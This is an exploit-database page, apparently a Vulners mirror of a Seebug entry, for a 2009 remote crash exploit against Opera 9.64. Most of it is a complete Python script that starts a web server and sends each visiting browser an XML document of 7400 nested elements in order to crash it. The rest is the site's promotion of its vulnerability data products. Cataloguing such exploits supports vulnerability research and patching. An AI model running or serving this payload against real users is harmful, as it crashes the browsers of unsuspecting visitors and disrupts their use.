Lucene search
K

Opera 9.64 (7400 nested elements) XML Parsing Remote Crash Exploit

🗓️ 31 Mar 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 9 Views

XML Parsing Remote Crash Exploit in Opera 9.6

Code

                                                #
#   Author : Ahmed Obied ([email protected])
#
#   - Similar to the bug found by Wojciech Pawlikowski for Firefox 
#     -> http://www.milw0rm.com/exploits/8306
#
#   - Tested using the latest version of Opera (9.64)
#
#   Usage  : python opera.py [port]
#    

import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):
        
    def get_exploit(self):
        exploit = \'<A>\' * 7400
        exploit = \'<xml>\' + exploit + \'</xml>\'
        return exploit
            
    def log_request(self, *args, **kwargs):
        pass

    def do_GET(self):
        if self.path == \'/\':
            print
            print \'[-] Incoming connection from %s\' % self.client_address[0]
            print \'[-] Sending header to %s ...\' % self.client_address[0]
            self.send_response(200)
            self.send_header(\'Content-type\', \'text/xml\')
            self.end_headers()
            print \'[-] Header sent to %s\' % self.client_address[0]
            print \'[-] Sending exploit to %s ...\' % self.client_address[0]
            self.wfile.write(self.get_exploit())
            print \'[-] Exploit sent to %s\' % self.client_address[0]

def main():
    if len(sys.argv) != 2:
        print \'Usage: %s [port]\' % sys.argv[0]
        sys.exit(1)
    try:
        port = int(sys.argv[1])
        if port < 1 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer((\'\', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print \'[-] Web server is running at http://%s:%d/\' % (ip, port)
            try:
                serv.serve_forever()
            except KeyboardInterrupt:
                print \'[-] Exiting ...\' 
        except socket.error:
            print \'[*] ERROR: a socket error has occurred ...\'
        sys.exit(-1)    
    except ValueError:
        print \'[*] ERROR: invalid port number ...\'
        sys.exit(-1)
            
if __name__ == \'__main__\':
    main()
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2009 00:00Current
7.1High risk
Vulners AI Score7.1
9